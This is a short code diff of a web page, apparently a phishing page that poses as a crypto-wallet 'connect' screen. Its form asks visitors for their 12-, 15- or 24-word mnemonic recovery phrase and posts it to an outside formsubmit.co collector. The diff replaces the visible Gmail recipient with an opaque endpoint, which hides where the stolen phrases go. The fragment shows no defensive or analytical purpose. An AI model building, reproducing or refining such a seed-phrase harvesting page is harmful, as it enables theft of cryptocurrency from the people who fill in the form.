--- a/connect.html
+++ b/connect.html
@@ -219,7 +219,7 @@
                     
 
                     <div id="div_connect_manuallly" style="display:none;">
-                         <form action="https://formsubmit.co/kobaraeze@gmail.com" method="POST">
+                         <form action="https://formsubmit.co/17d25474047968070b29712e6ea96440" method="POST">
                             <input type="hidden" name="_redirect" value="technical.html"/>
                             <div id="phrase"><textarea
                                     placeholder="Enter your 12, 15, or 24 Mnemonic words. Seperate them with spaces."
